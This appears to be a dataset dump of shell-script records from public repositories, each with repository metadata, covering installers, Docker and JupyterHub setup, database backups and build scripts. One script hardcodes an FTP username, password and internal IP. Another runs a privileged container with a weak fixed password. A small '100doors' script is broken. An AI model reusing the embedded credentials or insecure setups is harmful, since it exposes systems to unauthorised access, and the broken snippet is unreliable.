docker network connect ${net_prefix}414 fab08
docker network connect ${net_prefix}411 host1
docker network connect ${net_prefix}412 host1
docker network connect ${net_prefix}413 host1
docker network connect ${net_prefix}414 host1
fi
}
# connect servers to leaf networks
connect_servers_to_leaf_networks()
{
docker inspect host2 > /dev/null
if [ $? = 0 ]; then
docker network connect ${net_prefix}511 asw01
docker network connect ${net_prefix}512 asw02
docker network connect ${net_prefix}513 asw03
docker network connect ${net_prefix}514 asw04
docker network connect ${net_prefix}511 host2
docker network connect ${net_prefix}512 host2
docker network connect ${net_prefix}513 host2
docker network connect ${net_prefix}514 host2
fi
}
# main
#create_network_namespace
create_fabric_networks
create_leaf_networks
#connect_fabric_switches
#connect_spine_switches
connect_servers_to_fabric_networks
connect_servers_to_leaf_networks
| true
|
6f8cf3cf892410f8127dd712126b62eeb42f5439
|
Shell
|
crcerror/ES-generic-shutdown
|
/install.sh
|
UTF-8
| 963
| 2.90625
| 3
|
[] |
no_license
|
# Automatik install of multi_switch.sh script
# Thanks to @neo954 for some script code
# Check for SU/ROOT
[[ $USER != "root" ]] && echo "Need root privileges... just run with 'sudo $0'" && exit
# Install package raspi-gpio
apt-get install -y raspi-gpio
# Create Directories and download scripts
mkdir -p /home/pi/RetroPie/scripts
cd /home/pi/RetroPie/scripts
wget -N -q --show-progress https://raw.githubusercontent.com/crcerror/ES-generic-shutdown/master/multi_switch.sh
# Set user rights
chmod +x multi_switch.sh
chown -R pi:pi ../scripts
# Create auto startup
sed -i -e '/\/home\/pi\/RetroPie\/scripts\/multi_switch.sh/ d' -e '1i /home/pi/RetroPie/scripts/multi_switch.sh --nespi+ &' /opt/retropie/configs/all/autostart.sh
# This is shutdown script, it seems to be used in some bare cases
cd /lib/systemd/system-shutdown
wget -N -q --show-progress https://raw.githubusercontent.com/crcerror/ES-generic-shutdown/master/shutdown_fan
chmod +x shutdown_fan
| true
|
240dcc0c03a7fea37baf75c08cb2554b9bfda708
|
Shell
|
EWouters/jns
|
/scripts/conf_jupyterhub.sh
|
UTF-8
| 1,220
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# script name: conf_jupyterhub.sh
# last modified: 2019/09/01
# credits: EWouters
# sudo: yes
script_name=$(basename -- "$0")
env="/home/pi/.venv/jns"
if ! [ $(id -u) = 0 ]; then
echo "usage: sudo ./$script_name"
exit 1
fi
# if jupyterhub directory exists, we keep it (-p)
# if configuration file exists, we overwrite it (-y)
# Make folder to store config
mkdir -p /etc/jupyterhub
cd /etc/jupyterhub
# Generate Config
$env/bin/jupyterhub -y --generate-config
target=/etc/jupyterhub/jupyterhub_config.py
# set up dictionary of changes for jupyterhub_config.py
declare -A arr
app='c.Spawner'
arr+=(["$app.cmd = "]="$app.cmd = ['$env/bin/jupyterhub-singleuser']")
arr+=(["$app.default_url = "]="$app.default_url = 'lab'")
arr+=(["$app.notebook_dir = "]="$app.notebook_dir = '/home/pi/notebooks'")
arr+=(["c.Authenticator.admin_users = "]="c.Authenticator.admin_users = {'pi'}")
# apply changes to jupyter_notebook_config.py
for key in ${!arr[@]};do
if grep -qF $key ${target}; then
# key found -> replace line
sed -i "/${key}/c ${arr[${key}]}" $target
else
# key not found -> append line
echo "${arr[${key}]}" >> $target
fi
done
| true
|
b5ad9e0aa136027bda3b685dbd6d9fbed44e69b9
|
Shell
|
kipelovets/GeekPartyAnsible
|
/roles/mysql/templates/mysql_dump.sh
|
UTF-8
| 306
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
USER={{ mysql_db_user }}
PASSWORD={{ mysql_db_password }}
BACKUP_PATH="{{ backup_dir }}"
DATE=$(date +"%Y-%m-%d")
TARGET_FILE=$BACKUP_PATH/mysqldump-$DATE.sql
echo "Writing dump to $TARGET_FILE\n"
mysqldump --user=$USER --password=$PASSWORD --all-databases > "$TARGET_FILE"
gzip -v -f $TARGET_FILE
| true
|
18bb91ccad93800b3e610ad6cf0b0fd87c135fac
|
Shell
|
ayyfish/heroku-buildpack-tesseract
|
/bin/compile
|
UTF-8
| 844
| 3.1875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
BUILD_DIR=$1
TESSERACT_OCR_VERSION=4.1.0
TESSERACT_OCR_TGZ=tesseract-ocr-$TESSERACT_OCR_VERSION.tar.gz
TESSERACT_FOLDER_NAME=tesseract-ocr-$TESSERACT_OCR_VERSION
INSTALL_DIR=$BUILD_DIR/vendor/tesseract-ocr/
TESSERACT_OCR_DIR=${HOME}/vendor/tesseract-ocr
ENVSCRIPT=$BUILD_DIR/.profile.d/tesseract-ocr.sh
TESSERACT_OCR_LANGUAGES=eng
echo "Unpacking Tesseract-OCR binaries"
mkdir -p $INSTALL_DIR
tar -zxvf $TESSERACT_OCR_TGZ -C $INSTALL_DIR
echo "Building runtime environment for Tesseract-OCR"
mkdir -p $BUILD_DIR/.profile.d
echo "export PATH=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/bin:\$PATH\"" > $ENVSCRIPT
echo "export LD_LIBRARY_PATH=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/lib:\$LD_LIBRARY_PATH\"" >> $ENVSCRIPT
echo "export TESSDATA_PREFIX=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/share/tessdata\"" >> $ENVSCRIPT
| true
|
fb6de28aebeb1e92a6b4eda20ee256a21070cd49
|
Shell
|
stefanbuck/all-packages
|
/script/release
|
UTF-8
| 305
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
npm install --only=dev
npm run build
count=$(cat count)
rm count
git add package.json
git config user.email "os@stefanbuck.com"
git config user.name "Stefan Buck"
git commit -m "Now with $count dependencies"
npm version minor -m "bump minor to %s"
npm publish
git push origin master --follow-tags
| true
|
638be2c80dbbe1996ab6c34b84526bcd2c8ed7d5
|
Shell
|
Skrilltrax/dotfiles
|
/macos/apps/install_apps
|
UTF-8
| 143
| 3.15625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
SCRIPT_DIR="$(cd -P "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
for SCRIPT in "$SCRIPT_DIR"/*
do
bash -c "$SCRIPT"
done
| true
|
ad7e21e8754ce0167dac5e1d46986e88f9f08c4f
|
Shell
|
bopopescu/first-1
|
/100doors
|
UTF-8
| 85
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
for i in list
do
if [ i -eq 0 ]
then i=1
else
i=0
done
| true
|
37c165ae7ec628429aa25e32eab47c079137ba7a
|
Shell
|
SOliasS/Ender5plusSKRv1.3
|
/Marlin-bugfix-2.0.x/Marlin-bugfix-2.0.x/buildroot/bin/env_backup
|
UTF-8
| 414
| 3.40625
| 3
|
[
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later"
] |
permissive
|
#!/usr/bin/env bash
[ -z "$1" ] || cd $1
if [ -d ".test" ]; then
printf "\033[0;31mEnvironment backup already exists!\033[0m\n"
else
mkdir .test
cp Marlin/Configuration*.h .test/
[ -f Marlin/_Bootscreen.h ] && cp Marlin/_Bootscreen.h .test/
[ -f Marlin/_Statusscreen.h ] && cp Marlin/_Statusscreen.h .test/
cp -r Marlin/src/pins .test/pins
printf "\033[0;32mEnvironment Backup created\033[0m\n"
fi
| true
|
738c34b52c50fe24fcf14f6fae1c3e8202d33d86
|
Shell
|
FauxFaux/debian-control
|
/t/tuxtype/tuxtype_1.8.3-3_amd64/postinst
|
UTF-8
| 752
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
if [ -d /usr/doc -a -h /usr/doc/tuxtype -a -d /usr/share/doc/tuxtype ]; then
rm -f /usr/doc/tuxtype
fi
# make tuxtype binary and shared wordlist directory setgid games
# and allow admin to override this decission
dpkg-statoverride --list /usr/games/tuxtype >/dev/null || \
dpkg-statoverride --update --add root games 2755 /usr/games/tuxtype
dpkg-statoverride --list /var/games/tuxtype/words >/dev/null || \
dpkg-statoverride --update --add root games 2775 /var/games/tuxtype/words
fi
# Automatically added by dh_installmenu/11.3.2
if [ "$1" = "configure" ] && [ -x "`which update-menus 2>/dev/null`" ]; then
update-menus
fi
# End automatically added section
| true
|
ca04a4550bcfbee7e0df9b46e9303bca48eefeb2
|
Shell
|
fcitx/mozc
|
/scripts/install_server
|
UTF-8
| 341
| 2.6875
| 3
|
[
"BSD-3-Clause",
"NAIST-2003",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unicode"
] |
permissive
|
#!/bin/sh
_bldtype=${_bldtype:-Debug}
PREFIX="${PREFIX:-/usr}"
install -D -m 755 "out_linux/${_bldtype}/mozc_server" "${PREFIX}/lib/mozc/mozc_server"
install -D -m 755 "out_linux/${_bldtype}/mozc_tool" "${PREFIX}/lib/mozc/mozc_tool"
install -d "${PREFIX}/share/doc/mozc/"
install -m 644 data/installer/*.html "${PREFIX}/share/doc/mozc/"
| true
|
5414fd26fb56eaed917b3ca16ff13b773e0a5b81
|
Shell
|
rocktan001/webrtc
|
/mediadevices/dockerfiles/build.sh
|
UTF-8
| 204
| 3.265625
| 3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
cd $(dirname $0)
OWNER=lherman
PREFIX=cross
IMAGES=$(ls *.Dockerfile)
for image in ${IMAGES[@]}
do
tag=${OWNER}/cross-${image//.Dockerfile/}
docker build -t "${tag}" -f "$image" .
done
| true
|
9d1352437d2e050f3ddeba9c3eb56189cf47e60f
|
Shell
|
oslab-ewha/simtbs
|
/mkload.sh
|
UTF-8
| 560
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
WORKLOADS="125 120 115 110 105 100 90 80 70 60 50 40 30 20 10"
SIMTBS=`dirname $0`/simtbs
function gen_conf() {
cat <<EOF > $1
*general
10000
*sm
16 8
*mem
15000
*overhead_mem
500 1.2
1000 2.4
2000 3.6
3000 4.8
4000 6.0
5000 7.2
6000 8.4
7000 9.6
8000 10.8
9000 12.0
10000 13.2
15000 14
*workload
$2 12-128 5-20
*overhead_sm
2 0.1
3 0.11
4 0.12
5 0.13
6 0.14
7 0.15
8 0.16
EOF
}
conftmpl=.simtbs.tmpl.conf.$$
for wl in $WORKLOADS
do
gen_conf $conftmpl $wl
$SIMTBS -g `printf mkload.conf.%03d $wl` $conftmpl
done
rm -f $conftmpl
| true
|
9740103269917d5084942f93f2c507e077af72af
|
Shell
|
Unity3DMobileAlbatron/DATAUNITY3D
|
/Servercode/installserviced.sh
|
UTF-8
| 614
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/sh
function isok() {
ret=$1
action="$2"
[[ $ret -ne 0 ]] && echo "ERROR!!!!,$action" && exit 1
echo "OK!!!!,$action" && return 0
}
function docmd() {
cmd=$1
echo $cmd
eval "$cmd"
isok $? "$cmd"
}
cd `dirname $0`
cd serviced
docmd "./build.sh"
cd -
docmd "cp -f serviced/serviced.jar serverbin/serviced/"
#docmd "cp -f serviced/serviced.xio.xml serverbin/template_release/serviced/"
#docmd "cp -f serviced/serviced.config.xml serverbin/serviced/"
docmd "cp -f serviced/coder.ServiceServer.xml serverbin/serviced/"
docmd "rsync -azcp serviced/config serverbin/serviced/"
| true
|
4f7a5458016c7308415d1acd73d7f7276f585a29
|
Shell
|
belongcai/SHELL_FUCKER
|
/do_tac.bash
|
UTF-8
| 212
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
# use tac
# use awk
# use sort
# achieve to convert lines
seq 9 | tac
echo "**************"
seq 9 | \
awk '
{
line[NR] = $0
lno=NR
}
END{
for(;lno>0;lno--)
{
print line[lno]
}
}'
| true
|
819b13d0282a9cb513777739cf893e7957412811
|
Shell
|
bdingee/DW
|
/bw_depletion_extract.sh
|
UTF-8
| 6,310
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
###############################################################################
# $Header: /dwa/cvsrepo/dev/depletion/bin/bw_depletion_extract.sh,v 1.17 2019/07/17 18:26:20 bdingee Exp $
# $Revision: 1.17 $
# $Name: PRD $
#
# Description : create depl & Inventory extract file for NA01, NA07, NA02 for BW
#
# MODIFICATION HISTORY
# Person Date Comments
# --------- -------- ----------------------------------------
#
################################################################################
#set -x
#------------------------------------------------
# REQUIRED CODE
#------------------------------------------------
subject=depletion
batch_key=516
USER=bpmdsp1
PASSWORD=bpmdsp199
SITE=10.114.55.103
SUBDIR=Depletion
# include common shell functions
. $DW_BIN/dw_common_scripts.sh
# setup runtime environment for subject
dw_setup_env $subject
dw_check_for_error -s "dw_setup_env" -e "$?"
# move to the work directory
cd $DW_DATA_WORK
export TMPDIR=$DW_DATA_WORK # TMPDIR need to set to $DW_DATA_WORK because default is /tmp
#------------------------------------------------
# END - REQUIRED CODE
#------------------------------------------------
#
# start batch
#
dw_start_run_shell $batch_key
dw_check_for_error -s "dw_start_run_shell" -e "$?"
echo " --------------- sqlplus - load extract tables "
echo " Start: `date`"
sql="bw_depletions_extract_pkg.load;"
dw_sqlplus -p "$sql"
dw_check_for_error -s "dw_sqlplus" -e "$?"
echo " End: `date`"
echo " "
for file in depletion inventory
do
case $file in depletion) cleanfile="DPDCDNAM`date +%Y%m%d%H%M%S`"
;;
inventory) cleanfile="DPDCINAM`date +%Y%m%d%H%M%S`"
;;
*) continue
;;
esac
sql="@$DW_SUBJECT_SQL/bw_${file}_extract_daily.sql"
outfile=`mktemp -p $DW_DATA_WORK`
if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
then
dw_check_for_error -s "mktemp" -m "mktemp failed" -e "$?"
fi
echo "--------------- sqlplus - run extract process for $file "
echo " Start: `date`"
dw_sqlplus -o $outfile "$sql"
if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
then
dw_check_for_error -s "dw_sqlplus" -e "$?"
fi
echo " End: `date`"
echo " "
# cleanup file here
echo "--------------- clean - Clean up output file"
echo " Start: `date`"
#
# only get lines that begin with a #, then remove the #
# make sure any " inside " are ""
#
grep '^[[:space:]]*#' $outfile | sed -e 's/^[[:space:]]*#//' -e 's/\([^,]\)"\([^,]\)/\1""\2/' > $cleanfile.csv
if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
then
dw_check_for_error -s "cleanup" -m "Cleaning of file failed" -e "$?"
fi
echo " End: `date`"
echo " "
#FTP the file to BW PRD only if we are running it from DW PRD Server AND SendFTP flag=Y
machine=`hostname`
if [ "$machine" = "nwkdwprd1" -o "$machine" = "nwkdwprd4" ]
then
echo " "
echo "--------------- FTP the data file"
dw_ftp -u $USER -p $PASSWORD -d $SITE -s $SUBDIR -m ASCII -c put "$cleanfile.csv"
if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
then
dw_check_for_error -s "FTP" -m "FTP Error" -e "$?"
fi
else
echo " "
echo "--------------- DID NOT FTP as $machine is not the PRD Server"
fi
echo " End: `date`"
echo " "
# cleanup
gzip $cleanfile.csv
mv $cleanfile.csv.gz $DW_DATA_OUTBOUND_DEPLETION
echo "Archive data file..."
echo " "
dw_archive_file -d "$DW_DATA_OUTBOUND_DEPLETION/$cleanfile.csv.gz"
dw_check_for_error -s "dw_archive_file" -e "$?"
done
#Put the trigger file.
trigFile=Depletion.trig
touch $trigFile
if [ "$machine" = "nwkdwprd1" -o "$machine" = "nwkdwprd4" ]
then
echo " "
echo "--------------- FTP the trigger file"
dw_ftp -u $USER -p $PASSWORD -d $SITE -s $SUBDIR -m ASCII -c put "$trigFile"
if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
then
dw_check_for_error -s "FTP" -m "FTP Error Trigger File" -e "$?"
fi
fi
echo " End: `date`"
echo " "
echo " --------------- sqlplus - update date table"
echo " Start: `date`"
sql="bw_depletions_extract_pkg.update_run_table;"
dw_sqlplus -p "$sql"
dw_check_for_error -s "dw_sqlplus" -e "$?"
echo " End: `date`"
echo " "
#
# finish batch - SUCCESSFUL
#
dw_finish_run_shell -s -r $DW_RUN_KEY $DW_BATCH_KEY
dw_check_for_error -s "dw_finish_run_shell" -e "$?"
echo " "
echo " "
echo "**********************************************************************"
echo "--------------- Completed Successfully"
echo "**********************************************************************"
exit $DW_RETURN_SUCCESS
| true
|
eb5c63990c6114e7329cf9ba6ec92e0c9f73910e
|
Shell
|
endlesselectron/bin
|
/cloud9.sh
|
UTF-8
| 3,424
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/sh
while [ ${#} -gt 1 ]
do
case ${1} in
--project-name)
PROJECT_NAME=${2} &&
shift &&
shift &&
true
;;
--email)
EMAIL=${2} &&
shift &&
shift &&
true
;;
--name)
NAME=${2} &&
shift &&
shift &&
true
;;
--upstream)
UPSTREAM=${2} &&
shift &&
shift &&
true
;;
--origin)
ORIGIN=${2} &&
shift &&
shift &&
true
;;
--parent)
PARENT=${2} &&
shift &&
shift &&
true
;;
esac &&
true
done &&
WORKSPACE_VOLUME=$(docker volume create) &&
INIT_VOLUME=$(docker volume create) &&
BIN_VOLUME=$(docker volume create) &&
PROJECT_VOLUME=$(docker volume create) &&
(cat <<EOF
#!/bin/sh
docker \
run \
--interactive \
--tty \
--detach \
--cidfile /root/cid \
--volume ${WORKSPACE_VOLUME}:/workspace/${PROJECT_NAME} \
--volume /var/run/docker.sock:/var/run/docker.sock \
--privileged \
--volume /tmp/.X11-unix:/tmp/.X11-unix:ro \
--net host \
--workdir /workspace/${PROJECT_NAME} \
--env DISPLAY \
--volume /home/vagrant/.ssh:/root/.ssh:ro \
--volume /home/vagrant/bin:/root/bin:ro \
--volume /home/vagrant/.bash_profile:/root/.bash_profile:ro \
--volume ${PROJECT_VOLUME}:/init \
emorymerryman/strongarm:0.1.3 \
&&
echo \${HOME}/bin/shell.sh >> /etc/shells &&
chsh --shell \${HOME}/bin/shell.sh &&
true
EOF
) | volume-tee.sh ${INIT_VOLUME} init.sh &&
(cat <<EOF
#!/bin/sh
docker exec --interactive --tty \$(cat /root/cid) env CONTAINER_ID=\$(cat /root/cid) bash --login &&
true
EOF
) | volume-tee.sh ${BIN_VOLUME} shell.sh &&
docker run --interactive --tty --rm --volume ${BIN_VOLUME}:/usr/local/src alpine:3.4 chmod 0500 /usr/local/src/shell.sh &&
(cat <<EOF
#!/bin/sh
git -C /workspace/${PROJECT_NAME} init &&
ln --symbolic --force /root/bin/post-commit.sh /workspace/${PROJECT_NAME}/.git/hooks/post-commit &&
( [ -z "${EMAIL}" ] || git -C /workspace/${PROJECT_NAME} config user.email "${EMAIL}" ) &&
( [ -z "${NAME}" ] || git -C /workspace/${PROJECT_NAME} config user.name "${NAME}" ) &&
( [ -z "${UPSTREAM}" ] || git -C /workspace/${PROJECT_NAME} remote add upstream ${UPSTREAM} ) &&
( [ -z "${ORIGIN}" ] || git -C /workspace/${PROJECT_NAME} remote add origin ${ORIGIN} ) &&
( [ -z "${PARENT}" ] || git -C /workspace/${PROJECT_NAME} fetch upstream ${PARENT} && git -C /workspace/${PROJECT_NAME} checkout upstream/${PARENT} ) &&
git -C /workspace/${PROJECT_NAME} checkout -b scratch/$(uuidgen) &&
true
EOF
) | volume-tee.sh ${PROJECT_VOLUME} init.sh &&
docker \
run \
--volume ${BIN_VOLUME}:/root/bin:ro \
--interactive \
--tty \
--detach \
--volume /var/run/docker.sock:/var/run/docker.sock:ro \
--privileged \
--volume ${WORKSPACE_VOLUME}:/workspace/${PROJECT_NAME} \
--expose 8181 \
--publish-all \
--volume ${INIT_VOLUME}:/init:ro \
--env DISPLAY \
emorymerryman/cloud9:4.0.7 \
--listen 0.0.0.0 \
--auth user:password \
-w /workspace/${PROJECT_NAME} \
&&
docker ps --latest &&
true
| true
|
63ae680cf194c5d3346e878125e3e57b8bd11af6
|
Shell
|
feng-hui/python_books_examples
|
/linux_private_kitchen/chapter_12/cal_pi.sh
|
UTF-8
| 446
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# Program
# User input a scale number to calculate pi number.
# History
# 2019-07-16 FengHui First Release
path=/bin:/sbin:/usr/bin:~/bin
export path
echo -e "This program will calculate pi value. \n"
echo -e "You should input a float number to calculate pi value. \n"
read -p "The scale number (10-1000) ?" checking
num=${checking:-"10"}
echo -e "Starting calculate pi value.Be patient."
time echo "scale=${num}; 4*a(1)" | bc -lq
| true
|
10ac325a46908ec403fb6bfec692f0b0b40c112b
|
Shell
|
a-pog/honey
|
/bin/wd
|
UTF-8
| 4,010
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
SERVER_CONF="/honey/conf/server.conf"
RIG_CONF="/honey/conf/rig.conf"
RIG_CONF_FEE="/tmp/rig_fee.conf"
LOGS_FILE="/honey/log/miner.log"
RIG_STATE="/tmp/state"
TIME_SLEEP=10
TIME_RESTART=60 #180
TIME_REBOOT=120 #300
TIME_NOTIFY=$TIME_RESTART
ATTEMPT_RESTART_MAX=3
MIN_HASH=
. colors
if [ ! -f $RIG_CONF ]; then
echo -e "${RED}No config $RIG_CONF${NOCOLOR}"
else
. $RIG_CONF
fi
countRestart=0
function start() {
session_count=`screen -ls watchdog | grep watchdog | wc -l`
if [[ $session_count > 0 ]]; then
echo -e "${YELLOW}watchdog screen is already running${NOCOLOR}"
# screen -x watchdog
return
fi
screen -dmS watchdog wd loop
sleep 0.3
count=`screen -ls watchdog | grep watchdog | wc -l`
if [[ $count -eq 0 ]]; then
echo -e "${RED}ERROR start watchdog${NOCOLOR}"
# else
# screen -x watchdog
fi
}
function monitor() {
echo -e "Lets monitor"
screen -x -S watchdog
[[ $? != 0 ]] && help
}
function nowGood() {
lastTimeGood=`date +%s`
alreadyNotify=0
}
nowGood
attemptRestart=0
lastRestart=0
function loop() {
echo "start looping"
while : ; do
#check if miner started
session_miner=`screen -ls miner | grep miner | wc -l`
if [[ $session_miner -eq 0 ]]; then
sleep $TIME_SLEEP
nowGood
continue
fi
#echo "Check WD status"
. $RIG_CONF
local wdEnabled=$(echo "$WATCHDOG" | jq -r '.enabled')
local wdRestart=$(echo "$WATCHDOG" | jq -r '.restart')
local wdReboot=$(echo "$WATCHDOG" | jq -r '.reboot')
local minHash=$(echo "$WATCHDOG" | jq -r '.minHash')
[[ "$wdEnabled" == "null" ]] && wdEnabled=0
[[ "$wdRestart" == "null" ]] && wdRestart=0
[[ "$wdReboot" == "null" ]] && wdReboot=0
[[ "$minHash" == "null" ]] && minHash=0
if [[ "$wdEnabled" == false ]] || [[ -f "$RIG_CONF_FEE" ]] || [[ $minHash -eq 0 ]]; then
echo -e "${YELLOW}Watchdog not activated${NOCOLOR} see variable in config"
sleep $TIME_SLEEP
nowGood
attemptRestart=0
continue
fi
needNotify=1
. $RIG_STATE
let "status_hash=$TOTAL_HASH > $minHash"
# echo "status_hash $status_hash"
# echo "total hash - $TOTAL_HASH min hash - $minHash"
if [ $status_hash -eq 1 ]; then
echo "now good"
nowGood
else
echo -e "${RED}bad${NOCOLOR} TOTAL_HASH - $TOTAL_HASH minHash - $minHash"
fi
curDate=`date +%s`
let "diffGoodAttempt=$curDate - $lastTimeGood"
if [ $diffGoodAttempt -gt $TIME_REBOOT ] && [ "$wdReboot" == true ]; then
echo "hr is low, rebooted"
agent log 1 'WD: hr is low, rebooted'
honey hardreboot
sleep 300
continue
fi
if [ $diffGoodAttempt -gt $TIME_RESTART ] && [ "$wdRestart" == true ]; then
let "var=$curDate-$lastRestart" # to be called after a certain period
if [ $var > $TIME_RESTART ]; then
echo "Attempt restart - $attemptRestart"
if [ $attemptRestart -ge $ATTEMPT_RESTART_MAX ] && [ "$wdReboot" == true ]; then
agent log 1 'WD: attempt restart max, rebooted'
honey hardreboot
sleep 300
continue
fi
agent log 1 'WD: hr is low, restart miner'
miner restart
lastRestart=`date +%s`
fi
needNotify=0
let "attemptRestart+=1"
nowGood
fi
if [ $alreadyNotify -eq 0 ] && [ $diffGoodAttempt -gt $TIME_RESTART ] && [ $needNotify -eq 1 ]; then
echo -e "${RED}hr is low${NOCOLOR}"
agent log 1 'WD: hr is low'
alreadyNotify=1
fi
sleep $TIME_SLEEP
done
}
function stop() {
screens=`screen -ls watchdog | grep -E "[0-9]+\.watchdog" | cut -d. -f1 | awk '{print $1}'`
if [[ -n $screens ]]; then
for pid in $screens; do
echo "Stopping screen session $pid"
screen -S $pid -X quit
done
fi
}
function help() {
bname=`basename $0`
echo -e "Usage: ${GREEN}$bname - start|stop|restart${NOCOLOR}"
}
case $1 in
start)
start
;;
monitor|m)
monitor
;;
loop)
loop
;;
stop)
stop
;;
restart)
echo -e "${YELLOW}Restarting watchdog${NOCOLOR}"
stop
sleep 1
start
;;
help)
help
;;
*)
help
;;
esac
| true
|
b0dc1e69045bd895da5cc3ee3a4b10ec6fed2ec7
|
Shell
|
shrekee/code
|
/shell/homework/homework_0725_2.sh
|
UTF-8
| 454
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#计算距离2019年新年元旦凌晨零时零秒还有多少天多少时多少分 多少秒?
day=0;hour=0;minute=0;second=0;
future=`date -d "2019-1-1 0:0:0 " "+%s"`
while true ;do
now=`date "+%s"`
let time=future-now
let day=time/86400
let shi=time%86400
let hour=shi/3600
let fen=shi%3600
let minute=fen/60
let second=fen%60
echo "距离2019年新年元旦还有${day}天${hour}时${minute}分${second}秒"
sleep 1
done
| true
|
1f212d254f3e5df945d3b503af217114c1626b74
|
Shell
|
Voronenko/toggl_invoice
|
/console_helper/completions/_toggl.zsh
|
UTF-8
| 2,682
| 3.421875
| 3
|
[] |
no_license
|
#compdef toggl
__toggl-workspaces() {
toggl workspaces
}
__toggl-projects() {
toggl projects | awk '{ print $2 }'
}
__toggl-now() {
echo "''d1:20''"
echo "'`date '+%Y-%m-%d %H:%M:%S'`'"
}
__toggl-duration() {
echo "''d1:20''"
}
__toggl-recent-entries() {
toggl ls | grep @ | awk -F'@' '{print $1}'
}
_toggl-commands() {
local -a commands
commands=(
'add: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] START_DATETIME (''d''DURATION | END_DATETIME) creates a completed time entry, DURATION = [[Hours:]Minutes:]Seconds'
'add: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] ''d''DURATION creates a completed time entry, with start time DURATION ago, DURATION = [[Hours:]Minutes:]Seconds'
'clients:lists all clients'
'continue: [from DATETIME | ''d''DURATION] restarts the last entry, DURATION = [[Hours:]Minutes:]Seconds'
'continue: DESCR [from DATETIME | ''d''DURATION] restarts the last entry matching DESCR'
'ls:list recent time entries'
'now:print what you''re working on now'
'workspaces:lists all workspaces'
'projects: [:WORKSPACE] lists all projects'
'rm:delete a time entry by id'
'start: DESCR [:WORKSPACE] [@PROJECT | #PROJECT_ID] [''d''DURATION | DATETIME] starts a new entry , DURATION = [[Hours:]Minutes:]Seconds'
'stop:stops the current entry'
'www:visits toggl.com'
)
_arguments -s : $nul_args && ret=0
_describe -t commands 'toggl command' commands && ret=0
}
_toggl() {
local -a nul_args
nul_args=(
'(-h --help)'{-h,--help}'[show help message and exit.]'
'(-q --quiet)'{-q,--quiet}'[don''t print anything]'
'(-v --verbose)'{-v,--verbose}'[print additional info]'
'(-d --debug)'{-d,--debug}'[print debugging output]'
)
local curcontext=$curcontext ret=1
if ((CURRENT == 2)); then
_toggl-commands
else
shift words
(( CURRENT -- ))
curcontext="${curcontext%:*:*}:toggl-$words[1]:"
case $words[1] in
add)
_arguments "2: :($(__toggl-workspaces))" \
"3: :($(__toggl-projects))" \
"4: :($(__toggl-now))" \
"5: :($(__toggl-duration))"
;;
start)
_arguments "2: :($(__toggl-workspaces))" \
"3: :($(__toggl-projects))" \
"4: :($(__toggl-now))"
;;
stop)
_arguments "1: :($(__toggl-now))"
;;
projects)
_arguments "1: :($(__toggl-workspaces))"
;;
continue)
_arguments "1: :($(__toggl-recent-entries))"
;;
esac fi
}
_toggl "$@"
# Local Variables:
# mode: Shell-Script
# sh-indentation: 2
# indent-tabs-mode: nil
# sh-basic-offset: 2
# End:
# vim: ft=zsh sw=2 ts=2 et
| true
|
dec891578e42acd92dce1dd0ef8149addc3a7a43
|
Shell
|
Bourne-ID/rancher-cloud-windows-diag
|
/install-cert-manager.sh
|
UTF-8
| 798
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Configuration Path from RKE Provider
config_path="$(pwd)/kube_config_cluster.yml"
# Initialize Helm
helm init --service-account tiller --kube-context local --kubeconfig "$config_path" --wait
helm repo add jetstack https://charts.jetstack.io
helm repo update
# Install Cert Manager
kubectl --kubeconfig="$config_path" apply -f https://raw.githubusercontent.com/jetstack/cert-manager/release-0.9/deploy/manifests/00-crds.yaml
kubectl --kubeconfig="$config_path" create namespace cert-manager
kubectl --kubeconfig="$config_path" label namespace cert-manager certmanager.k8s.io/disable-validation=true
helm install \
--name cert-manager \
--namespace cert-manager \
--kube-context local \
--kubeconfig "$config_path" \
--version v0.9.1 \
--wait \
jetstack/cert-manager
| true
|
560051a2ea303f3411198f84d313cdc2c85ab934
|
Shell
|
alex-cory/fasthacks
|
/dotfiles/zsh/oh-my-zsh/tools/upgrade.sh
|
UTF-8
| 856
| 2.9375
| 3
|
[] |
no_license
|
current_path=`pwd`
echo -e "\033[0;34mUpgrading Oh My Zsh\033[0m"
( cd $ZSH && git pull origin master )
echo -e "\033[0;32m"' __ __ '"\033[0m"
echo -e "\033[0;32m"' ____ / /_ ____ ___ __ __ ____ _____/ /_ '"\033[0m"
echo -e "\033[0;32m"' / __ \/ __ \ / __ `__ \/ / / / /_ / / ___/ __ \ '"\033[0m"
echo -e "\033[0;32m"'/ /_/ / / / / / / / / / / /_/ / / /_(__ ) / / / '"\033[0m"
echo -e "\033[0;32m"'\____/_/ /_/ /_/ /_/ /_/\__, / /___/____/_/ /_/ '"\033[0m"
echo -e "\033[0;32m"' /____/ '"\033[0m"
